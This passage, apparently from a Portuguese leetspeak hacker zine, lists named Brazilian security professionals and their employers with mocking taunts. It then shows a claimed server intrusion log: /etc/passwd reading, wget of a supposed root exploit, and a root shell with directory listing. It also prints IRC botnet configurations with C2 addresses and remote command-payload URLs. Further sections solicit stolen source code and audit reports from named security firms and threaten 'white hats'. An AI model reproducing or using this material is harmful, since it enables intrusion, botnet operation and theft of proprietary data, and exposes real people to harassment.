Rodrigo Resende Dos Santos Igen/Unifesp Romero Borges Telefonica Empresas Ruy de Oliveira Banco Mercantil do Brasil Sandra Rocha Brasil Telecom Sandro Marani Plantar S/A Sidnei Yokoyama Yokoyama Consultoria Ltda <- L4M3RZ quE n0s c0ntacT4r4m Silvia Calmon de Albuquerque Universidade Fumec Silvio da Rocha Munhoz GLOBALVALUE SOLUCOES SA Solon de Assiis Soares Netsol Network Solution Thadeu Lima de Souza Cascardo Holoscópio Thiago Henrique Sampaio Totaro Formata Sistemas Thiago Rochael Seven Internet Tullio Christianini Dualtec Informatica Ltda Ubiracy Campos Rodrigues Telecomdados Serviços Ltda-ME Uelington Elias Banco ABN AMRO Bank S/A Ulisses Dias Goncalves de Assuncao EMBRATEL S.A Valdemiro Campos Filho Embratel S.A Victor Arnaud ALOG Vinicius Ribeiro Zuquim Fiat Automóveis S.A. Wagner Batista Assis WKVE Telecom Wallenstein Brito e Silva Lotemoc Distribuidora Ltda Wanda Marcia Maciel Lacerda Empresa Mineira de Computadores Wanderlei de Sa Fernandez Telecomdados Serviços Ltda-ME Wayner Damasceno Araujo Amorim GBarbosa Comercial Ltda. Wellington Augusto Parreiras de Jeus GVS Global Value Solucoes Wellington Meirelles Rezende SENAC Willian Goncalves Dias Empresa de Infovias S.A. Wilson Lopes Registro.br <---- W000000000WW Wilson Prado Junior Banco Mercantil do Brasil Wilson Vasconcelos Pereira Neto ENGESIG IND. E COM. LTDA. Adelmo Alves Avancini CPQD Adriano Cansian ACME! UNESP Computer Security Research <--- W0000WW Alan Pessotti Aranibar Ericsson Alberto Camilli CCE USP Alberto Courrege Gomide PUC-SP Alberto Dos Santos Silva Junior .comDominio Soluções de Tecnologia S/A Alessandro Maurilio Sanches Sant Anna EMBRAER - Empresa Brasileira de Aeronáu Alessandro Rabelo Silva Visanet Alex Lima Dias Alexandre da Silva Augusto Yamaha Motor do Brasil Alexandre Maia Vlahos .comDominio Soluções de Tecnologia S/A Alexandre Nuccini Pires EDS Alexandre Olivio de Andrade CPM S.A. Aline Pessoa de Vasconcelos SENAI Allan Rodrigo de Lima da Silva Universidade de São Paulo Ana Paula M. S. Freitas Allnet Internet Anderson Agapito Diveo do Brasil Andre Correa Malware Block List <--- ÃHN!?!?!? Andre Gerhard CCE - USP Andre Luis Rodrigues Ferreira UNESP - Reitoria Andre Luiz Chagas Martos Cooperativa Paulista de Teatro Andre Luiz da Silva CEFET/SP Andre Proto ACME! UNESP Computer Security Research <-- W000000WW Andre Ricardo Landim Módulo Security Solutions - CLARO SP1 <-- HAHAHAHAHA Andre Uratsuka Manoel Insite Andrey Lee Cisco <---- W000000000WW Antonio Galvao de Rezende Filho NIC.BR <---- W000000000WW Armando Camara Junior INPE <--- h0n3yp0t br4z1l Arthur Antunes Marques Gregorio PUC-SP Arthur Molnar TRILOGY INFORMATICA LTDA - ME Artur Renato Araujo da Silva DH&C Outsourccing Augusto Bott Catho Online Augusto Panachao Cisco <---- W000000000WW Bruno Barbosa Sarri ACME! UNESP Computer Security Research <-- W000000WW Bruno Ferreira Baldim TVA Sistemas de Televisao SA Bruno Goncalves de Paula Senai Suiço Bruno Wallace Bernardino da Silva Alog Datacenters Camila C. Moraes Registro .br <---- W000000000WW Carlos Campana Cisco <---- W000000000WW Carlos Coletti UNESP - Reitoria Carlos Eduardo Santos Cardoso Vipway Serv. de Telecom. LTDA Carlos Henrique P. C. Chaves Visanet Carolina Bozza AFINA SISTEMAS Carolina Rambaldi Trigo Multirede Informática Ltda. Celso Minoru Kuwajima QoS Cesar Henrique Keiti Kuroiwa NIC.BR <---- W000000000WW Cid Blanco Filho Infoclass Des Serv Infor. Ltda Claudia de Abreu Silva Claudio Seiki Arashiro PUC-SP Clayton Teodoro Allnet - Internet Cleber Martim de Alexandre Registro.br <---- W000000000WW Cleber Paiva de Souza POLI/Naval - USP Cristiano Jacometti de Souza Agência Estado Cristiano Maynart Pereira UNISC - Universidade de Santa Cruz do Su Cristine Hoepers CERT.br / NIC.br <---- ACID HOEPERS BURN!! \o/ Cyro Augusto Baffi FLY INTERNET LTDA Dalton Matsuo Tavares UNICOC Daniel Borba do Valle Senai Suiço Daniel Checchia Americanas.com SA Daniel de Oliveira Partner IT Daniel Galante Cardoso Escoloa SENAI Suiço-Brasileira Daniel Shibata UNITELCO Danilo Pinheiro Rodrigues TKS - Turn Key Services Danny Mcpherson Arbor Networks <---- WheRe iS Jose Nazario, man? Danton Nunes InterNexo Ltda. David Robert Camargo de Campos Registro .br <---- W000000000WW Debora Camacho Silva Denis Magno Carvalho Agrizzi do Brasil Dioraci Correa Junior ACME! UNESP Computer Security Research <--- W0000WW Ederson Tadeu Bitencourt Senai Suiço Edson Goncalves de Araujo ICB USP Eduardo Ascenco Reis CTBC Multimídia Eduardo Batista Insite Serviços e Comércio Ltda Eduardo Junior Lopes Telecon Consultoria e Treinamento em Tel Eduardo Mendes Vieira Eduardo R. Spina IBM Brasil <--- W0000WW Eduardo Sztokbant Registro.br Eduardo Takeo Ueda LSD-IME-USP <-- Last Stage of Delirium? Elmy Borges Pinho Junior Impsat Comunicações LTDA Elton Gustavo Fanelli Vivax S/A Emanuela Fernanda Urban DDoS Consultoria <--- 0 M3LH0R N0M3 D3 T0D0S H4H4H4 Enderson Ferreira Agencia Estado Ethy H. Brito InterNexo Ltda. Everton L. Silva Araujo Allnet Internet Ewerton Vieira Arbor Networks <--- Jose? Fabiano Soares TPD - Telefonica Pesquisa e Desenvolvime Fabio Camara Fonseca Brasilsite Telecomunicações Ltda Fabio Carneiro de Castro Centro de Computacao Eletronica da USP Fabio Kerr do Amaral Filho GPlus informática Ltda. Fabio Magalhaes Catunda Digital Express Ltda Fabricio Fadel Kammer Conchalnet Fabricio Nunes Monte .comDominio Soluções de Tecnologia S/A Felipe Jonas Rodrigues Ericsson Fellipe Roscelli Azevedo Leite de Melo Escola SENAI Suiço-Brasileira Fernando Augusto Higa Banco do Brasil SA Fernando de Falchi Multirede Informática Ltda. Fernando Henrique Teixeira Carlos IBM Brasil Fernando Romero TIVIT Tecnologia da Informação Flavio Marques Azevedo CENTRO UNIVERSITÁRIO MÓDULO Francisco Jose Candeias Figueiredo GRC/AI - UNESP Frederico A C Neves Registro.br <--- W0000WW Gabriel Catropa EDS Gilberto Maquigussa Diagnosticos da America Glauco Ludwig UFRGS Gustavo Lozano NIC Mexico <--- W0000WW hola chiquitito Gustavo R. Carreira Ache Laboratórios S.A. Gustavo Rodrigues Ramos DH&C Outsourccing Helder Jean Brito da Silva UFRN Helio Loureiro Ericsson Henrique Terada Layer2 Hugo Koji Kobayashi Registro.br <--- W0000WW Igor Alexandre Souza Layer2 Brasil Ivan Francolin Martinez CEFETSP Ivo de Carvalho Peixinho CAIS/RNP <--- A HA UHU HUU O PEIXINHO AGORA É PF!!!! Jackson Klarosk SENAI: Suíço-Brasileira Jair Valmor Basso Junior Associação Educacional Nove de Julho Jefferson Fernandes Bianco VIVO Jefferson Maglio INTERCIA INTERNET SERVICES Joao Damas ISC Joao Francisco P. Castilho MÓDULO SECURITY <--- AHAHAHAHA Joao Marcelo Ceron POP-RS/RNP - CERT-RS <--- W0000WW Joao Paulo Seregatte Costa Senai Suiço-Brasileira Jorge Luiz Correa ACME! UNESP Computer Security Research <--- W0000WW Jose Luis Dos Santos PUC-SP Jose Roberto B. Gimenez UNESP - Universidade Estadual Paulista Josias Dos Santos Senai Suiço Brasileira Juliana Machado Fernandes Klaus Steding Jessen CERT.br / NIC.br <--- W0000WW Kok Sau Mei TJH Engenharia Leandro Andre Darcanchy Terra Networks Brasil S.A. Leandro Arabi Alexandre ACME! UNESP Computer Security Research <--- W0000WW Leandro Bertholdo UFRGS Leandro Borges UNICOC Leandro Lopes Romao TIVIT Leda Limas de Souza Almeida senai suiço Leomar Sergio Duarte Bradesco Leonardo Gama Souza Telefonica S/A Leonardo Lemes UFRGS Leonardo Muroya Universo Online S/A Liane Tarouco UFRGS Lilian Pricola TIVIT Lincoln Francisco Alves da Silva Lincoln Moreira Santander Banespa Luana Coimbra Diveo do Brasil Luciane Zardo Diveo do Brasil Luciano Martins CPQD Luciano Pereira Gomes FIASA Lucien Rocha Lucien PoP-AP/RNP <--- W0000WW Lucio Henrique Franco Santander Banespa Lucio Mello Petroleo Brasileiro S. A. Luis Felipe M. de Moraes Luiz Eduardo Dos Santos Aruba Wireless Networks Luiz Morte ChSTI Informática Major Ronaldo Medeiros Lopes Comando de Aviação do Exército <--- W0000WW Manuel Carlos Accarini Pernavia Igen/Unifesp Marcello Zillo Neto Módulo Security Solutions <--- AHAHAH Marcelo Albuquerque Copati UOL Marcelo Carvalho da Silva AKZO NOBEL LTDA. Marcelo de Brito Miola DH&C Outsourccing Marcelo Gardini do Amaral Registro.br <--- W0000WW Marcelo Lima Impsat Comunicações Ltda Marcelo Rodrigues Nic.br <--- W0000WW Marcio Castellani Softnet Logical Brasil Marcio Jorge Dos Santos PUC-SP Marco A. Filippetti Vivax Multiserviços SA Marco Corso Neto Impsat Comunicações Ltda Marcos Machado InfoLink Marcus Vinicius de Arruda Santos UOL Maria Carolina de Araujo Cintra KR Inc Mariana Vieira da Silva Lima DASA Marlon Borba Tribunal Regional Federal da 3ª Região Marta Cristina Bazzo Cilento CCE/USP Mauricio Gaudencio Cisco <--- W0000WW Mauricio Jose Silva Matias Escola SENAI Mauricio Lima da Silva Senai Suiço Mauricio Tadeu MTA System Ltda Mauro Cesar Bernardes Centro de Computação Eletrônica Mehmet Akcin ICANN <--- o_O Micael Cappi Banco Bradesco S/A Miguel Angel Marquez Galleguillos Senai Suiço Brasileira Milton Kaoru Kashiwakura NIC.br <--- W0000WW Miriam von Zuben CERT.br <--- W0000WW Murilo Couto Registro.br <--- W0000WW Nelson Murilo DTE Patricia Pereira da Silva STK Consultoria Paulo Arqueiro Eres Senai Paulo Bernardo S. Silva Proteus Security Systems <--- W0000WW Paulo Henrique Cardoni Unitelco Paulo Jentsch Future Technology <--- W0000WW c4d3 0 Denny Roger? Paulo Kuester Neto PUC-SP Pedro Quintanilha EDS Pedro Vinicius L. Teixeira InfoLink Teleinformática Ltda. Rafael Ferreira Motta Alog Data Center Rafael Mendes Pereira UFRGS - Universidade Federal do Rio Gran Rafael Ortis Diez Marcos comdominio Ralf Braga IDEPES Raniery Pontes RNP <--- W0000WW Raquel Plec Nic.br <--- W0000WW Renan Cerqueira da Silva senai suico brasileira Renan Marcelino Alves Renato Augusto Banco Bradesco S/A Renato Ramalho LSD-IME-USP Renato Rodrigues Branco PROCERGS Ricardo Giorgi RTGC & Consultores Associados <--- AHAHAHHA Ricardo Gregorio Patara LACNIC Ricardo Kleber Martins Galvao UFRN Ricardo Luiz Santana de Souza senai suico brasileira Robson Ferreira Bravo Tivit Robson Hideki Digital Express Rodolfo Algatti Cheroti Tivit Rodrigo Cesar Benaglia Piovesana Nortel Rodrigo de Souza Ferreira VIPWay Telecomunicações Ltda Rodrigo Graeff voipz telecomm Rodrigo Jose Mastropietro Intelig Telecomunicacoes ltda Rodrigo Resende Dos Santos Igen/Unifesp Rodrigo Roberto Canola CTF Techonologies do Brasil Ltda Rodrigo Rotta Dedic Rodrigo Zuolo Carvalho PUC/SP Rogerio da Silva e Souza INPE/CPTEC Ronaldo Castro de Vasconcellos CAIS/RNP Rubens Fernando de Lima Mendrone IBM Russ Mundy Sparta Sandra Denise Mota senai suico brasileira Sandra Jovita Santos TRANSIT DO BRASIL Sandro Enomoto Agencia Estado Sergio Dias Symantec <---- [[[[ SERJÃO DIAS ]]] Sergio Henrique Marcelino Castro da Rosa comDominio soluções de Tecnologia S/A Steve Conte ICANN Steve Crocker Shinkuro Thiago Alves Siqueira CCE - USP Thiago Augusto Baffi FLY INTERNET LTDA Thiago Vinicius de Souza Santos senai suico brasileira Tjhin Ju Hua VIVO Uelington Elias Banco ABN AMRO Real S/A Urias Bittencourt Softnet Logical Valdinei Soares da Silva Senai - Suiço Brasileira Valmir Claudio Consoni VIPWay Serviços de Telecomunicações L Vander Freitas Dos Santos Allnet Internet Victor Pereira N/A Vinicius Cruz Oliveira Senai Suico Viviani Paz AusCERT <--- W0000WW crocodile dundee h4x0r Wander Marcio Dos Reis Rio Negro Warnilson Diniz Silva Sunway Net Informatica Ltda - ME William Costa Souza ESCOLA SENAI SUICO-BRASILEIRA Willian Okuhara Caprino Visanet Willians Santana Grafnorte Wilson Rogerio Lopes Registro.br <--- W0000WW ----------------------------------------------------------------------------------------- 9; G4ry K4sp4r0v 0wnz hackerxadrez.com.br ----------------------------------------------------------------------------------------- M3 ap0s3nt3I d0 x4dr3z, B3bi muTCh4 v0dk4 RuSs4 3 FuI h4ck3Ar. Viv4 Lênin e a Mãe RúSSia! Professor Hacker Brasil: (14) 9728-8787 ou 3656-1868 $ uname -a;id Linux server.linux04.info 2.6.9-42.0.10.ELsmp #1 SMP Fri Feb 16 17:13:42 EST 2007 x86_64 x86_64 x86_64 GNU/Linux uid=32817(cabicera) gid=32820(cabicera) groups=32820(cabicera) http://www.forum-hacker.com.br/forum/ Index of /forum Name Last modified Size Description [DIR] Parent Directory 13-Oct-2007 01:00 - [DIR] cache/ 02-Oct-2007 00:15 - [DIR] files/ 02-Oct-2007 00:40 - [DIR] images/ 19-Sep-2007 18:03 - [DIR] store/ $ pwd /home/cabicera/public_html $ cat /etc/passwd | grep xadre hackerxa:x:33451:33454::/home/hackerxa:/usr/local/cpanel/bin/noshell $ wget modulo.com.br/.nery/0day-magico $ ./0day-magico 0day mÁgic0 by Fernando Nery & Anderson Ramos HERE c0m3s y0uR R00T5h3LL # ls -la / total 71586 drwxr-xr-x 28 root root 4096 Oct 12 18:30 . drwxr-xr-x 28 root root 4096 Oct 12 18:30 .. -rw-r--r-- 1 root root 0 Oct 12 18:30 .autofsck -rw------- 1 root root 1024 Jan 17 2007 .rnd -rwxr--r-- 1 root root 101376 Oct 14 01:00 aquota.user drwx--x--x 4 root root 4096 Jan 18 2007 backup drwxr-xr-x 2 root root 4096 Aug 28 06:42 bin drwxr-xr-x 4 root root 1024 Apr 17 15:07 boot -rw-r--r-- 1 root root 370 Aug 2 2004 client-config-overrides.txt -rw-r--r-- 1 root root 7746 Dec 8 2004 client_config_update.py -rw------- 1 root root 17858560 Mar 1 2007 core.12978 -rw------- 1 root root 17858560 Mar 1 2007 core.19558 -rw------- 1 root root 40050688 Apr 24 11:44 core.32336 drwxr-xr-x 9 root root 4620 Oct 12 18:33 dev -rw-r--r-- 1 root root 126059 Jun 28 15:37 error_log drwxr-xr-x 95 root root 12288 Oct 14 03:23 etc drwx--x--x 1070 root root 36864 Oct 13 09:29 home drwxr-xr-x 2 root root 4096 Aug 12 2004 initrd drwxr-xr-x 2 root root 4096 Aug 18 15:01 ioncube drwxr-xr-x 11 root root 4096 Jun 27 04:38 lib drwxr-xr-x 7 root root 4096 Oct 2 07:15 lib64 drwx------ 2 root root 16384 Jan 17 2007 lost+found drwxr-xr-x 2 root root 4096 Aug 12 2004 media drwxr-xr-x 2 root root 4096 Apr 11 2007 misc drwxr-xr-x 2 root root 4096 Aug 12 2004 mnt drwxr-xr-x 2 root root 4096 Aug 12 2004 opt dr-xr-xr-x 282 root root 0 Oct 12 15:29 proc -rw-r--r-- 1 root root 1369 Jun 28 2004 public_key.txt -rwxr--r-- 1 root root 1920 Oct 13 09:29 quota.user drwxr-x--- 16 root root 4096 Oct 14 03:23 root drwxr-xr-x 2 root root 12288 Aug 28 06:42 sbin drwxr-xr-x 5 root root 20480 Oct 14 01:00 scripts drwxr-xr-x 2 root root 4096 Jan 17 2007 selinux drwxr-xr-x 2 root root 4096 Aug 12 2004 srv drwxr-xr-x 9 root root 0 Oct 12 15:29 sys drwxr-xr-x 3 root root 4096 Aug 23 2006 tftpboot drwxrwxrwt 13 root root 217088 Oct 14 03:28 tmp drwxr-xr-x 19 root root 4096 Jun 28 14:13 usr drwxr-xr-x 25 root root 4096 Oct 10 11:01 var # echo "b0tn3ts e irc b0ts 3nc0ntr4das Na Maquina" b0tn3ts e irc b0ts 3nc0ntr4das Na Maquina ... $servidor='143.107.198.48' unless $servidor; my $porta='8002'; my @canais=("#ssh"); my @adms=("XgeN"); $servidor='58.142.61.3' unless $servidor; my $porta='6667'; my @canais=("#root"); my @adms=("Tonka","Dence"); $servidor='201.236.28.219' unless $servidor; my $porta='6667'; my @canais=("#subatk"); my @adms=("DarkAttack","subzid"); ( A 3$s4 4L7ur4 4 m4qu1n4 j4 v1r0u f3$74 ) ###############CONFIGURATION################### my $processo = "/usr/local/apache/bin/nscan -DSSL"; my $printcmd="http://www.d1046199.domain.com/script.jpg"; #<---- Change this for your CMD my $server="irc.dal.net"; my $porta="6667"; my $nick="zurek22_x"; my $chan="#supremox"; ###############END OF CONFIGURATION############ ###############CONFIGURATION################### my $processo = "/usr/local/apache/bin/nscan -DSSL"; my $printcmd="http://www.szkolapruszcz.neostrada.pl/scripTx.jpg"; #<---- Change this for your CMD my $server="irc.dal.net"; my $porta="6667"; my $nick="jabujabujabu"; my $chan="#supremor"; ----------------------------------------------------------------------------------------- 10; w4nt3d s0urc3 k0d3z & StuFF ----------------------------------------------------------------------------------------- o. Módulo Risk Manager <---------------- o santo graal omfg o. Aker Secure Mail Gateway [OK! Já t3m0s!] o. Aker Web Content Analyzer o. Aker Monitoring Service o. Aker Firewall [OK! Já t3m0s!] o. Aker Antivirus Module o. Aker Secure Roaming o. OpenCS M-Trusted o. OpenCS Sniper o. OpenCS Precise o. ou qUalQu3r 0utr0 pr0duT0 d3 3mpR3Sa br4s1l3iRa d3 sEgUr4nçA o. R3l4tóRi0s d3 AnÁl1s3 d4 Módulo o. R3l4tóRi0s d3 AnÁl1s3 d4 Proteus o. R3l4tóRi0s d3 AnÁl1s3 d4 Cipher o. R3l4tóRi0s d3 AnÁl1s3 d4 Future o. R3l4tóRi0s d3 AnÁl1s3 d4 Pangéia o. R3l4tóRi0s d3 AnÁl1s3 d4 Clavis o. R3l4tóRi0s d3 C0nsuLt0R14 d4 KPMG o. R3l4tóRi0s d4 Ernst & Young o. R3l4tóRi0s d4 Price Waterhouse Coopers o. R3l4tóRi0s d4 Deloitte Touché o. ou qUalQu3r 0utr0 r3lAtóRi0 d3 3mpR3Sa br4s1l3iRa d3 sEgUr4nçA 0u c0NsulT0r14 p4p0-fur4d0 S3 v0Cê c0ns3Gu1r 4lguNs d3sS3s aRt1Gos d3 luX0, enV1E p4rA ish0tthewhitehat@gmail.com v4m0s VeR c0m0 sã0 aS "soFiSTic4dAs" aNális3s d3 s3gur4nçA d3ssAs 3mpR3sAs e A quAlIDad3 d0s s3us cóDig0s. ----------------------------------------------------------------------------------------- 11; outr0 ----------------------------------------------------------------------------------------- Wh1t3 h4tz e p0s3rs d4 c3n4, aQu1 v4i um R3c4d0 p4r4 voCÊS: 0 s3u f1m eSTá prÓX1m0. C4d4 v3z m4iS 0s s0ld4d0s d0 eXéRc1t0 i sh0t the white hat 3sTã0 c0mpr0m3t1d0s 3m 0wn4r v0Cês e 4cab4r c0m sU4s M1s3ráve1s v1d4s. Qu3m 4ind4 qu1s3r p3rm4n3c3r d0 0utr0 l4d0 é m3lh0r v1g14r b3m s3us c0mput4d0r3s su4s s3nh4s, v3r1f1c4r s3us s1st3m4s e 4 suA s3guR4nçA fÍSic4 pQ v0cê p0d3 s3r 0 prÓx1m0. ----------------------------------------------------- | C0nTr1bu4m p4r4 0 ca0s ish0tthewhitehat@gmail.com | -----------------------------------------------------